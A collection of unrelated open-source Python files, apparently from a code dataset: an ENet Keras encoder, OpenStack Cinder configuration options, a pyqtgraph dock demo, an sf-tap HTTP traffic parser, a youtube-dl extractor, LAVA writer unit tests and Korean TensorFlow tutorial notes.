# Batch normalization + PReLU
encoder = BatchNormalization(momentum=0.1)(encoder) # enet_unpooling uses momentum of 0.1, keras default is 0.99
encoder = PReLU(shared_axes=[1, 2])(encoder)
# conv
if not asymmetric and not dilated:
encoder = Conv2D(internal, (3, 3), padding='same')(encoder)
elif asymmetric:
encoder = Conv2D(internal, (1, asymmetric), padding='same', use_bias=False)(encoder)
encoder = Conv2D(internal, (asymmetric, 1), padding='same')(encoder)
elif dilated:
encoder = Conv2D(internal, (3, 3), dilation_rate=(dilated, dilated), padding='same')(encoder)
else:
raise(Exception('You shouldn\'t be here'))
encoder = BatchNormalization(momentum=0.1)(encoder) # enet_unpooling uses momentum of 0.1, keras default is 0.99
encoder = PReLU(shared_axes=[1, 2])(encoder)
# 1x1
encoder = Conv2D(output, (1, 1), use_bias=False)(encoder)
encoder = BatchNormalization(momentum=0.1)(encoder) # enet_unpooling uses momentum of 0.1, keras default is 0.99
encoder = SpatialDropout2D(dropout_rate)(encoder)
other = inp
# other branch
if downsample:
other, indices = MaxPoolingWithArgmax2D()(other)
other = Permute((1, 3, 2))(other)
pad_feature_maps = output - inp.get_shape().as_list()[3]
tb_pad = (0, 0)
lr_pad = (0, pad_feature_maps)
other = ZeroPadding2D(padding=(tb_pad, lr_pad))(other)
other = Permute((1, 3, 2))(other)
encoder = add([encoder, other])
encoder = PReLU(shared_axes=[1, 2])(encoder)
if downsample:
return encoder, indices
else:
return encoder
def build(inp, dropout_rate=0.01):
pooling_indices = []
enet, indices_single = initial_block(inp)
enet = BatchNormalization(momentum=0.1)(enet) # enet_unpooling uses momentum of 0.1, keras default is 0.99
enet = PReLU(shared_axes=[1, 2])(enet)
pooling_indices.append(indices_single)
enet, indices_single = bottleneck(enet, 64, downsample=True, dropout_rate=dropout_rate) # bottleneck 1.0
pooling_indices.append(indices_single)
for _ in range(4):
enet = bottleneck(enet, 64, dropout_rate=dropout_rate) # bottleneck 1.i
enet, indices_single = bottleneck(enet, 128, downsample=True) # bottleneck 2.0
pooling_indices.append(indices_single)
# bottleneck 2.x and 3.x
for _ in range(2):
enet = bottleneck(enet, 128) # bottleneck 2.1
enet = bottleneck(enet, 128, dilated=2) # bottleneck 2.2
enet = bottleneck(enet, 128, asymmetric=5) # bottleneck 2.3
enet = bottleneck(enet, 128, dilated=4) # bottleneck 2.4
enet = bottleneck(enet, 128) # bottleneck 2.5
enet = bottleneck(enet, 128, dilated=8) # bottleneck 2.6
enet = bottleneck(enet, 128, asymmetric=5) # bottleneck 2.7
enet = bottleneck(enet, 128, dilated=16) # bottleneck 2.8
return enet, pooling_indices
|
PavlosMelissinos/enet-keras
|
src/models/enet_unpooling/encoder.py
|
Python
|
mit
| 4,098 | 0.00366 |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright 2012 Red Hat, Inc.
# Copyright 2013 NTT corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Command-line flag library.
Emulates gflags by wrapping cfg.ConfigOpts.
The idea is to move fully to cfg eventually, and this wrapper is a
stepping stone.
"""
import socket
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import netutils
from cinder.i18n import _
CONF = cfg.CONF
logging.register_options(CONF)
core_opts = [
cfg.StrOpt('api_paste_config',
default="api-paste.ini",
help='File name for the paste.deploy config for cinder-api'),
cfg.StrOpt('state_path',
default='/var/lib/cinder',
deprecated_name='pybasedir',
help="Top-level directory for maintaining cinder's state"), ]
debug_opts = [
]
CONF.register_cli_opts(core_opts)
CONF.register_cli_opts(debug_opts)
global_opts = [
cfg.StrOpt('my_ip',
default=netutils.get_my_ipv4(),
help='IP address of this host'),
cfg.StrOpt('glance_host',
default='$my_ip',
help='Default glance host name or IP'),
cfg.IntOpt('glance_port',
default=9292,
help='Default glance port'),
cfg.ListOpt('glance_api_servers',
default=['$glance_host:$glance_port'],
help='A list of the glance API servers available to cinder '
'([hostname|ip]:port)'),
cfg.IntOpt('glance_api_version',
default=1,
help='Version of the glance API to use'),
cfg.IntOpt('glance_num_retries',
default=0,
help='Number retries when downloading an image from glance'),
cfg.BoolOpt('glance_api_insecure',
default=False,
help='Allow to perform insecure SSL (https) requests to '
'glance'),
cfg.BoolOpt('glance_api_ssl_compression',
default=False,
help='Enables or disables negotiation of SSL layer '
'compression. In some cases disabling compression '
'can improve data throughput, such as when high '
'network bandwidth is available and you use '
'compressed image formats like qcow2.'),
cfg.StrOpt('glance_ca_certificates_file',
help='Location of ca certificates file to use for glance '
'client requests.'),
cfg.IntOpt('glance_request_timeout',
default=None,
help='http/https timeout value for glance operations. If no '
'value (None) is supplied here, the glanceclient default '
'value is used.'),
cfg.StrOpt('scheduler_topic',
default='cinder-scheduler',
help='The topic that scheduler nodes listen on'),
cfg.StrOpt('volume_topic',
default='cinder-volume',
help='The topic that volume nodes listen on'),
cfg.StrOpt('backup_topic',
default='cinder-backup',
help='The topic that volume backup nodes listen on'),
cfg.BoolOpt('enable_v1_api',
default=True,
help=_("DEPRECATED: Deploy v1 of the Cinder API.")),
cfg.BoolOpt('enable_v2_api',
default=True,
help=_("Deploy v2 of the Cinder API.")),
cfg.BoolOpt('api_rate_limit',
default=True,
help='Enables or disables rate limit of the API.'),
cfg.ListOpt('osapi_volume_ext_list',
default=[],
help='Specify list of extensions to load when using osapi_'
'volume_extension option with cinder.api.contrib.'
'select_extensions'),
cfg.MultiStrOpt('osapi_volume_extension',
default=['cinder.api.contrib.standard_extensions'],
help='osapi volume extension to load'),
cfg.StrOpt('volume_manager',
default='cinder.volume.manager.VolumeManager',
help='Full class name for the Manager for volume'),
cfg.StrOpt('backup_manager',
default='cinder.backup.manager.BackupManager',
help='Full class name for the Manager for volume backup'),
cfg.StrOpt('scheduler_manager',
default='cinder.scheduler.manager.SchedulerManager',
help='Full class name for the Manager for scheduler'),
cfg.StrOpt('host',
default=socket.gethostname(),
help='Name of this node. This can be an opaque identifier. '
'It is not necessarily a host name, FQDN, or IP address.'),
# NOTE(vish): default to nova for compatibility with nova installs
cfg.StrOpt('storage_availability_zone',
default='nova',
help='Availability zone of this node'),
cfg.StrOpt('default_availability_zone',
default=None,
help='Default availability zone for new volumes. If not set, '
'the storage_availability_zone option value is used as '
'the default for new volumes.'),
cfg.StrOpt('default_volume_type',
default=None,
help='Default volume type to use'),
cfg.StrOpt('volume_usage_audit_period',
default='month',
help='Time period for which to generate volume usages. '
'The options are hour, day, month, or year.'),
cfg.StrOpt('rootwrap_config',
default='/etc/cinder/rootwrap.conf',
help='Path to the rootwrap configuration file to use for '
'running commands as root'),
cfg.BoolOpt('monkey_patch',
default=False,
help='Enable monkey patching'),
cfg.ListOpt('monkey_patch_modules',
default=[],
help='List of modules/decorators to monkey patch'),
cfg.IntOpt('service_down_time',
default=60,
help='Maximum time since last check-in for a service to be '
'considered up'),
cfg.StrOpt('volume_api_class',
default='cinder.volume.api.API',
help='The full class name of the volume API class to use'),
cfg.StrOpt('backup_api_class',
default='cinder.backup.api.API',
help='The full class name of the volume backup API class'),
cfg.StrOpt('auth_strategy',
default='keystone',
choices=['noauth', 'keystone', 'deprecated'],
help='The strategy to use for auth. Supports noauth, keystone, '
'and deprecated.'),
cfg.ListOpt('enabled_backends',
default=None,
help='A list of backend names to use. These backend names '
'should be backed by a unique [CONFIG] group '
'with its options'),
cfg.BoolOpt('no_snapshot_gb_quota',
default=False,
help='Whether snapshots count against gigabyte quota'),
cfg.StrOpt('transfer_api_class',
default='cinder.transfer.api.API',
help='The full class name of the volume transfer API class'),
cfg.StrOpt('replication_api_class',
default='cinder.replication.api.API',
help='The full class name of the volume replication API class'),
cfg.StrOpt('consistencygroup_api_class',
default='cinder.consistencygroup.api.API',
help='The full class name of the consistencygroup API class'),
cfg.StrOpt('os_privileged_user_name',
default=None,
help='OpenStack privileged account username. Used for requests '
'to other services (such as Nova) that require an account '
'with special rights.'),
cfg.StrOpt('os_privileged_user_password',
default=None,
help='Password associated with the OpenStack privileged '
'account.',
secret=True),
cfg.StrOpt('os_privileged_user_tenant',
default=None,
help='Tenant name associated with the OpenStack privileged '
'account.'),
]
CONF.register_opts(global_opts)
|
saeki-masaki/cinder
|
cinder/common/config.py
|
Python
|
apache-2.0
| 9,037 | 0 |
import sys
## Make sure pyqtgraph is importable
p = os.path.dirname(os.path.abspath(__file__))
p = os.path.join(p, '..', '..')
sys.path.insert(0, p)
from pyqtgraph.Qt import QtCore, QtGui
from DockArea import *
from Dock import *
app = QtGui.QApplication([])
win = QtGui.QMainWindow()
area = DockArea()
win.setCentralWidget(area)
win.resize(800,800)
from Dock import Dock
d1 = Dock("Dock1", size=(200,200))
d2 = Dock("Dock2", size=(100,100))
d3 = Dock("Dock3", size=(1,1))
d4 = Dock("Dock4", size=(50,50))
d5 = Dock("Dock5", size=(100,100))
d6 = Dock("Dock6", size=(300,300))
area.addDock(d1, 'left')
area.addDock(d2, 'right')
area.addDock(d3, 'bottom')
area.addDock(d4, 'right')
area.addDock(d5, 'left', d1)
area.addDock(d6, 'top', d4)
area.moveDock(d6, 'above', d4)
d3.hideTitleBar()
print "===build complete===="
for d in [d1, d2, d3, d4, d5]:
w = QtGui.QWidget()
l = QtGui.QVBoxLayout()
w.setLayout(l)
btns = []
for i in range(4):
btns.append(QtGui.QPushButton("%s Button %d"%(d.name(), i)))
l.addWidget(btns[-1])
d.w = (w, l, btns)
d.addWidget(w)
import pyqtgraph as pg
p = pg.PlotWidget()
d6.addWidget(p)
print "===widgets added==="
#s = area.saveState()
#print "\n\n-------restore----------\n\n"
#area.restoreState(s)
s = None
def save():
global s
s = area.saveState()
def load():
global s
area.restoreState(s)
#d6.container().setCurrentIndex(0)
#d2.label.setTabPos(40)
#win2 = QtGui.QMainWindow()
#area2 = DockArea()
#win2.setCentralWidget(area2)
#win2.resize(800,800)
win.show()
#win2.show()
|
robertsj/poropy
|
pyqtgraph/dockarea/__main__.py
|
Python
|
mit
| 1,587 | 0.018904 |
import socket
import json
import sys, traceback
import redis
class http_parser:
def __init__(self, sfhttp, is_client = True):
self.__METHOD = 0
self.__RESP = 1
self.__HEADER = 2
self.__BODY = 3
self.__TRAILER = 4
self.__CHUNK_LEN = 5
self.__CHUNK_BODY = 6
self.__CHUNK_END = 7
self._sfhttp = sfhttp
self._is_client = is_client
if is_client:
self._state = self.__METHOD
else:
self._state = self.__RESP
self._data = []
self.result = []
self._ip = ''
self._port = ''
self._peer_ip = ''
self._peer_port = ''
self._method = {}
self._response = {}
self._resp = {}
self._header = {}
self._trailer = {}
self._length = 0
self._remain = 0
self.__is_error = False
def in_data(self, data, header):
if self.__is_error:
return
if self._ip == '' or self._port == '':
if header['from'] == '1':
self._ip = header['ip1']
self._port = header['port1']
self._peer_ip = header['ip2']
self._peer_port = header['port2']
elif header['from'] == '2':
self._ip = header['ip2']
self._port = header['port2']
self._peer_ip = header['ip1']
self._peer_port = header['port1']
self._data.append(data)
try:
self._parse(header)
except Exception:
self.__is_error = True
print('parse error:', file=sys.stderr)
exc_type, exc_value, exc_traceback = sys.exc_info()
print("*** extract_tb:", file=sys.stderr)
print(repr(traceback.extract_tb(exc_traceback)), file=sys.stderr)
print("*** format_tb:", file=sys.stderr)
print(repr(traceback.format_tb(exc_traceback)), file=sys.stderr)
print("*** tb_lineno:", exc_traceback.tb_lineno, file=sys.stderr)
def _push_data(self):
result = {}
if self._is_client:
if self._method == {}:
self.__is_error = True
return
result['method'] = self._method
else:
if self._response == {}:
self.__is_error = True
return
result['response'] = self._response
result['header'] = self._header
result['trailer'] = self._trailer
result['ip'] = self._ip
result['port'] = self._port
self.result.append(result)
self._method = {}
self._response = {}
self._resp = {}
self._header = {}
self._trailer = {}
self._length = 0
self._remain = 0
def _parse(self, header):
while True:
if self._state == self.__METHOD:
if not self._parse_method():
break
elif self._state == self.__RESP:
if not self._parse_response():
break
elif self._state == self.__HEADER:
if not self._parse_header(header):
break
elif self._state == self.__BODY:
self._skip_body()
if self._remain > 0:
break
elif self._state == self.__CHUNK_LEN:
if not self._parse_chunk_len():
break
elif self._state == self.__CHUNK_BODY:
self._skip_body()
if self._remain > 0:
break
self._state = self.__CHUNK_LEN
elif self._state == self.__CHUNK_END:
self._skip_body()
if self._remain > 0:
break
self._state = self.__TRAILER
else:
break
def _parse_chunk_len(self):
(result, line) = self._read_line()
if result:
self._remain = int(line.split(b';')[0], 16) + 2
self._state = self.__CHUNK_BODY
if self._remain == 2:
self._state = self.__CHUNK_END
return True
else:
return False
def _parse_trailer(self):
(result, line) = self._read_line()
if result:
if len(line) == 0:
if self._is_client:
self._state = self.__METHOD
else:
self._state = self.__RESP
else:
sp = line.split(b': ')
val = (b': '.join(sp[1:])).decode('utf-8')
val = val.strip()
self._trailer[sp[0].decode('utf-8')] = val
return True
else:
return False
def _parse_method(self):
(result, line) = self._read_line()
if result:
sp = line.split(b' ')
self._method['method'] = sp[0].decode('utf-8')
self._method['uri'] = sp[1].decode('utf-8')
self._method['ver'] = sp[2].decode('utf-8')
self._state = self.__HEADER
return True
else:
return False
def _parse_response(self):
(result, line) = self._read_line()
if result:
sp = line.split(b' ')
self._response['ver'] = sp[0].decode('utf-8')
self._response['code'] = sp[1].decode('utf-8')
self._response['msg'] = (b' '.join(sp[2:])).decode('utf-8')
self._state = self.__HEADER
return True
else:
return False
def _parse_header(self, sftap_header):
(result, line) = self._read_line()
if result:
if line == b'':
if 'content-length' in self._header:
self._remain = int(self._header['content-length'])
if self._remain > 0:
self._state = self.__BODY
elif ('transfer-encoding' in self._header and
self._header['transfer-encoding'].lower() == 'chunked'):
self._state = self.__CHUNK_LEN
elif self._is_client:
self._push_data()
self._state = self.__METHOD
else:
self._push_data()
self._state = self.__RESP
elif ('transfer-encoding' in self._header and
self._header['transfer-encoding'].lower() == 'chunked'):
self._state = self.__CHUNK_LEN
elif self._is_client:
self._push_data()
self._state = self.__METHOD
else:
self._push_data()
self._state = self.__RESP
else:
sp = line.split(b': ')
val = (b': '.join(sp[1:])).decode('utf-8')
val = val.strip()
ctype = sp[0].decode('utf-8').lower()
if ctype == 'content-type' and val.split('/')[0] == 'video':
self._sfhttp.input_video(val, sftap_header,
self._ip, self._port,
self._peer_ip, self._peer_port)
self._header[sp[0].decode('utf-8').lower()] = val
return True
else:
return False
def _skip_body(self):
while len(self._data) > 0:
num = sum([len(x) for x in self._data[0]])
if num <= self._remain:
self._data.pop(0)
self._remain -= num
if self._remain == 0:
if self._is_client:
self._push_data()
self._state = self.__METHOD
else:
self._push_data()
self._state = self.__RESP
else:
while True:
num = len(self._data[0][0])
if num <= self._remain:
self._data[0].pop(0)
self._remain -= num
else:
self._data[0][0] = self._data[0][0][self._remain:]
self._remain = 0
if self._remain == 0:
if self._state == self.__BODY:
if self._is_client:
self._push_data()
self._state = self.__METHOD
else:
self._push_data()
self._state = self.__RESP
return
def _read_line(self):
line = b''
for i, v in enumerate(self._data):
for j, buf in enumerate(v):
idx = buf.find(b'\n')
if idx >= 0:
line += buf[:idx].rstrip()
self._data[i] = v[j:]
suffix = buf[idx + 1:]
if len(suffix) > 0:
self._data[i][0] = suffix
else:
self._data[i].pop(0)
if len(self._data[i]) > 0:
self._data = self._data[i:]
else:
self._data = self._data[i + 1:]
return (True, line)
else:
line += buf
return (False, None)
class sftap_http:
def __init__(self, uxpath):
self._content = []
self._conn = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self._conn.connect(uxpath)
print('connected to', uxpath, file=sys.stderr)
self._header = {}
self.__HEADER = 0
self.__DATA = 1
self._state = self.__HEADER
self._http = {}
self._redis = redis.Redis()
def run(self):
while True:
buf = b'' + self._conn.recv(65536)
if len(buf) == 0:
print('remote socket was closed', file=sys.stderr)
return
self._content.append(buf)
self._parse()
def input_video(self, content, header, server_ip, server_port,
client_ip, client_port):
flowid = (header['ip1'],
header['ip2'],
header['port1'],
header['port2'],
header['hop'])
if flowid in self._http:
self._http[flowid][2] = True
msg = 'VOPEN %s %s %s %s' % (client_ip, client_port,
server_ip, server_port)
self._redis.rpush('http', msg)
print(msg)
def _parse(self):
while True:
if self._state == self.__HEADER:
(result, line) = self._read_line()
if result == False:
break
self._header = self._parse_header(line)
if self._header['event'] == 'DATA':
self._state = self.__DATA
elif self._header['event'] == 'CREATED':
flowid = self._get_id()
c = http_parser(self, is_client = True)
s = http_parser(self, is_client = False)
self._http[flowid] = [c, s, False, False]
elif self._header['event'] == 'DESTROYED':
try:
flowid = self._get_id()
c = self._http[flowid][0]
s = self._http[flowid][1]
if self._http[flowid][2] == True:
msg = 'VCLOSE %s %s %s %s' % (c._ip, c._port,
s._ip, s._port)
self._redis.rpush('http', msg)
print(msg)
msg = 'CLOSE %s %s %s %s' % (c._ip, c._port,
s._ip, s._port)
self._redis.rpush('http', msg)
print(msg)
del self._http[flowid]
except KeyError:
pass
elif self._state == self.__DATA:
num = int(self._header['len'])
(result, buf) = self._read_bytes(num)
if result == False:
break
flowid = self._get_id()
if flowid in self._http:
if self._header['match'] == 'up':
# client
c = self._http[flowid][0]
c.in_data(buf, self._header)
if self._http[flowid][3] == False:
msg = 'OPEN %s %s %s %s' % (c._ip, c._port,
c._peer_ip,
c._peer_port)
self._redis.rpush('http', msg)
print(msg)
self._http[flowid][3] = True
elif self._header['match'] == 'down':
# server
self._http[flowid][1].in_data(buf, self._header)
while True:
if (len(self._http[flowid][0].result) > 0 and
len(self._http[flowid][1].result) > 0):
c = self._http[flowid][0].result.pop(0)
s = self._http[flowid][1].result.pop(0)
else:
break
else:
pass
self._state = self.__HEADER
else:
print("ERROR: unkown state", file=sys.stderr)
exit(1)
def _read_line(self):
line = b''
for i, buf in enumerate(self._content):
idx = buf.find(b'\n')
if idx >= 0:
line += buf[:idx]
self._content = self._content[i:]
suffix = buf[idx + 1:]
if len(suffix) > 0:
self._content[0] = suffix
else:
self._content.pop(0)
return (True, line)
else:
line += buf
return (False, b'')
def _read_bytes(self, num):
n = 0
for buf in self._content:
n += len(buf)
if n < num:
return (False, None)
data = []
while True:
buf = self._content.pop(0)
if len(buf) <= num:
data.append(buf)
num -= len(buf)
else:
d = buf[:num]
data.append(d)
self._content.insert(0, buf[num:])
num -= len(d)
if num == 0:
return (True, data)
return (False, None)
def _parse_header(self, line):
d = {}
for x in line.split(b','):
m = x.split(b'=')
d[m[0].decode('utf-8')] = m[1].decode('utf-8')
return d
def _get_id(self):
return (self._header['ip1'],
self._header['ip2'],
self._header['port1'],
self._header['port2'],
self._header['hop'])
def main():
uxpath = '/tmp/sf-tap/tcp/http'
if len(sys.argv) > 1:
uxpath = sys.argv[1]
parser = sftap_http(uxpath)
parser.run()
if __name__ == '__main__':
main()
|
7senses/shaka
|
shaka.py
|
Python
|
gpl-2.0
| 15,841 | 0.003283 |
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
js_to_json,
parse_duration,
unescapeHTML,
)
class DRBonanzaIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?dr\.dk/bonanza/[^/]+/\d+/[^/]+/(?P<id>\d+)/(?P<display_id>[^/?#&]+)'
_TEST = {
'url': 'http://www.dr.dk/bonanza/serie/154/matador/40312/matador---0824-komme-fremmede-',
'info_dict': {
'id': '40312',
'display_id': 'matador---0824-komme-fremmede-',
'ext': 'mp4',
'title': 'MATADOR - 08:24. "Komme fremmede".',
'description': 'md5:77b4c1ac4d4c1b9d610ab4395212ff84',
'thumbnail': r're:^https?://.*\.(?:gif|jpg)$',
'duration': 4613,
},
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id, display_id = mobj.group('id', 'display_id')
webpage = self._download_webpage(url, display_id)
info = self._parse_html5_media_entries(
url, webpage, display_id, m3u8_id='hls',
m3u8_entry_protocol='m3u8_native')[0]
self._sort_formats(info['formats'])
asset = self._parse_json(
self._search_regex(
r'(?s)currentAsset\s*=\s*({.+?})\s*</script', webpage, 'asset'),
display_id, transform_source=js_to_json)
title = unescapeHTML(asset['AssetTitle']).strip()
def extract(field):
return self._search_regex(
r'<div[^>]+>\s*<p>%s:<p>\s*</div>\s*<div[^>]+>\s*<p>([^<]+)</p>' % field,
webpage, field, default=None)
info.update({
'id': asset.get('AssetId') or video_id,
'display_id': display_id,
'title': title,
'description': extract('Programinfo'),
'duration': parse_duration(extract('Tid')),
'thumbnail': asset.get('AssetImageUrl'),
})
return info
|
valmynd/MediaFetcher
|
src/plugins/youtube_dl/youtube_dl/extractor/drbonanza.py
|
Python
|
gpl-3.0
| 1,678 | 0.026222 |
from nose.tools import assert_equal, assert_raises
import mock
import xmlrpc
from src.writers import FileWriter, LavaWriter
from src.writers import UnavailableError
class TestFileWriter(object):
OUTPUT_DIR = 'foo'
CONTENT = 'test'
NAME = 'test-job-name'
def test_fail_open(self):
cfg = {
'output_dir': self.OUTPUT_DIR,
}
mo = mock.mock_open()
with mock.patch('builtins.open', mo, create=True) as mocked:
mocked.side_effect = IOError
writer = FileWriter(cfg)
assert_raises(UnavailableError, writer.write, dict(),
self.NAME, self.CONTENT)
def test_write(self):
cfg = {
'output_dir': self.OUTPUT_DIR,
}
mo = mock.mock_open(read_data=self.CONTENT)
with mock.patch('builtins.open', mo, create=True) as mocked:
path = '%s/%s.yaml' % (self.OUTPUT_DIR, self.NAME)
mocked_file = mocked.return_value
writer = FileWriter(cfg)
results = writer.write(dict(), self.NAME, self.CONTENT)
mocked.assert_called_once_with(path, 'w')
mocked_file.write.assert_called_with(self.CONTENT)
assert_equal(results, [path])
class TestLavaWriter(object):
DEVICE_TYPE = 'foo_bar'
CONTENT = 'test'
NAME = 'test-job-name'
UI_ADDRESS = 'http://webui.example.org'
@mock.patch('xmlrpc.client.ServerProxy')
def test_connection_error(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
}
response = {
'status': 'offline',
}
mock.side_effect = xmlrpc.client.Error
assert_raises(UnavailableError, LavaWriter, cfg)
@mock.patch('xmlrpc.client.ServerProxy')
def test_device_offline(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
}
response = {
'status': 'offline',
}
mock_proxy = mock.return_value
mock_proxy.scheduler.get_device_status.return_value = response
writer = LavaWriter(cfg)
assert_raises(UnavailableError, writer.write, board,
self.NAME, self.CONTENT)
@mock.patch('xmlrpc.client.ServerProxy')
def test_write_unique(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
'web_ui_address': self.UI_ADDRESS,
}
response = {
'status': 'online',
}
mock_proxy = mock.return_value
mock_proxy.scheduler.submit_job.return_value = 42
writer = LavaWriter(cfg)
results = writer.write(board, self.NAME, self.CONTENT)
mock_proxy.scheduler.get_device_status.assert_called_with('%s_01' % self.DEVICE_TYPE)
mock_proxy.scheduler.submit_job.assert_called_with(self.CONTENT)
assert_equal(results, ['%s/scheduler/job/%d' % (self.UI_ADDRESS, 42)])
@mock.patch('xmlrpc.client.ServerProxy')
def test_write_multiple(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
'web_ui_address': self.UI_ADDRESS,
}
response = {
'status': 'online',
}
mock_proxy = mock.return_value
mock_proxy.scheduler.submit_job.return_value = (42, 84)
writer = LavaWriter(cfg)
results = writer.write(board, self.NAME, self.CONTENT)
mock_proxy.scheduler.get_device_status.assert_called_with('%s_01' % self.DEVICE_TYPE)
mock_proxy.scheduler.submit_job.assert_called_with(self.CONTENT)
assert_equal(results, ['%s/scheduler/job/%d' % (self.UI_ADDRESS, 42),
'%s/scheduler/job/%d' % (self.UI_ADDRESS, 84)])
|
free-electrons/custom_tests_tool
|
tests/test_writers.py
|
Python
|
gpl-2.0
| 4,332 | 0.000462 |
##### 텐서 딥러닝 1장
import tensorflow as tf
hello = tf.constant('Hello, Tensorflow')
sess = tf.Session()
print(sess.run(hello))
# 'b'는 bytes literals라는 뜻이다.
node1 = tf.constant(3.0, tf.float32) # 숫자, 데이터타입
node2 = tf.constant(4.0) # 숫자, 데이터타입
node3 = tf.add(node1, node2) # 숫자, 데이터타입
# node3 = node1 + node2 # 이렇게도 사용가능
print(node1)
print(node2)
print(node3)
sess = tf.Session()
print('sess.run(node1, node2):', sess.run([node1, node2]))
print('sess.run(node3):', sess.run(node3))
# 그래프는 미리 만들어놓고 실행시키는 단계에서 값을 주고 싶을 때
# placeholder
a = tf.placeholder(tf.float32)
b = tf.placeholder(tf.float32)
adder_node = a + b
print(sess.run(adder_node, feed_dict={a:3, b:4.5}))
print(sess.run(adder_node, feed_dict={a:[1,3], b:[2,4]}))
# tendor는 array를 말한다.
# 어레이의 랭크
# 0:scalar // 1:vector // 2:matrix // n:n-tensor.....
# tensor의 shape
# .shape()해서 나오는 모양
# type
# int32 // float32
# 정리
# 그래프를 설계, 빌드!
# 그래프 실행(sess.run, 변수설정)
# 결과 반환
#### 텐서 딥러닝 4장 - 파일에서 데이터 읽어오기
import numpy as np
import tensorflow as tf
xy = np.loadtxt('C:\python\DeepLearningPythonStudy\DeepLearning\DeepLearning\\02_Deep_ChoTH\data\data-01-test-score.csv', delimiter=',', dtype=np.float32)
x_data = xy[:, 0:-1]
y_data = xy[:, [-1]]
print(x_data.shape, x_data, len(x_data))
print(y_data.shape, y_data)
# 참고
# b = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
# b[:, 1] # 전체 행의 1번 열 다 출력
# b[-1] # 마지막행
# b[-1, :] # 마지막 행 전체 출력
# b[0:2, :] # 1,2번 행의 전체 열
# 몇차원 어레이냐? -> 랭크, rank
# 어떤 모양의 어레이냐? -> 셰입, shape
# 축, axis
sess = tf.InteractiveSession()
t = tf.constant([1,2,3,4])
tf.shape(t).eval()
t = tf.constant([[1,2],
[3,4]])
tf.shape(t).eval()
t = tf.constant([[[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
[[13, 14, 15, 16], [17, 18, 19, 20], [21, 22, 23, 24]]]])
tf.shape(t).eval()
m1 = tf.constant([[1.,2.]])
m2 = tf.constant(3.)
tf.shape(m1+m2).eval()
tf.reduce_mean([1.,2.], axis=0).eval() # integer이면 안된다. float!!!
x = [[1.,2.],
[3.,4.]]
tf.reduce_mean(x).eval()
tf.reduce_mean(x, axis=1).eval()
tf.reduce_mean(x, axis=0).eval() # 가장 바깥쪽의 축이 0이 된다.
tf.reduce_mean(x, axis=-1).eval() # 가장 안쪽의 축이 -1이 된다.
tf.reduce_sum(x).eval()
tf.reduce_sum(x, 1).eval()
tf.reduce_sum(x, 0).eval()
tf.reduce_sum(x, -1).eval() # 가장 안쪽
x = [[0,1,2],
[2,1,0]]
tf.argmax(x).eval() # 가장 큰 수의 인덱스를 반환하는 함수, 축을 적지 않으면 0으로 간주
tf.argmax(x, 1).eval()
tf.argmax(x, 0).eval()
tf.argmax(x, -1).eval()
t = np.array([[[0, 1, 2],
[3, 4, 5]],
[[6, 7, 8],
[9, 10, 11]]])
t.shape
tf.reshape(t, shape=[-1,3]).eval() # 안쪽은 3, 나머지는 알아서 해(-1), 2차원으로
tf.reshape(t, shape=[-1,1,3]).eval() # 안쪽은 3, 그다음은 1, 나머지는 알아서(-1), 2차원으로
tf.squeeze([[0], [1], [2]]).eval() # 차원축소
tf.expand_dims([0,1,2], 1).eval() # 차원추가
# one hot
tf.one_hot([[0], [1], [2], [0]], depth=3).eval() # 랭크가 자동으로 추가
t = tf.one_hot([[0], [1], [2], [0]], depth=3) # 랭크가 자동적으로 추가되는 것을 막기 위해 reshape
tf.reshape(t, shape=[-1, 3]).eval()
tf.cast([1.8, 2.2, 3.3, 4.9], tf.int32).eval()
tf.cast([True, False, 1 == 1, 0 == 1], tf.int32).eval()
x = [1, 4]
y = [2, 5]
z = [3, 6]
# Pack along first dim.
tf.stack([x, y, z]).eval()
tf.stack([x, y, z], axis=0).eval()
tf.stack([x, y, z], axis=1).eval()
x = [[0, 1, 2],
[2, 1, 0]]
tf.ones_like(x).eval()
tf.zeros_like(x).eval()
for x, y in zip([1,2,3], [4,5,6]):
print(x, y)
for x, y, z in zip([1,2,3], [4,5,6], [7,8,9]):
print(x, y, z)
# K = tf.sigmoid(tf.matmul(X, W1) + b1)
# hypothesis = tf.sigmoid(tf.matmul(K, W2) + b2)
# ML lab 09-1:Neural Net for XOR
# XOR 신경망 코드
import numpy as np
import tensorflow as tf
x_data = np.array([[0,0], [0,1], [1,0], [1,1]], dtype=np.float32)
y_data = np.array([[0], [1], [1], [0]], dtype=np.float32)
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)
W = tf.Variable(tf.random_normal([2,1]), name='weight')
b = tf.Variable(tf.random_normal([1]), name='bias')
# 데이터가 적어서 softmax 함수 생략
hypothesis = tf.sigmoid(tf.matmul(X,W) + b)
cost = -tf.reduce_mean(Y*tf.log(hypothesis) + (1-Y) * tf.log(1-hypothesis)) # 손실함수 구하기
train = tf.train.GradientDescentOptimizer(learning_rate=0.1).minimize(cost) # 경사감소법으로 손실함수 줄여나가기
# Accuracy computation
# True is hypothesis>0.5 else False
predicted = tf.cast(hypothesis>0.5, dtype=tf.float32)
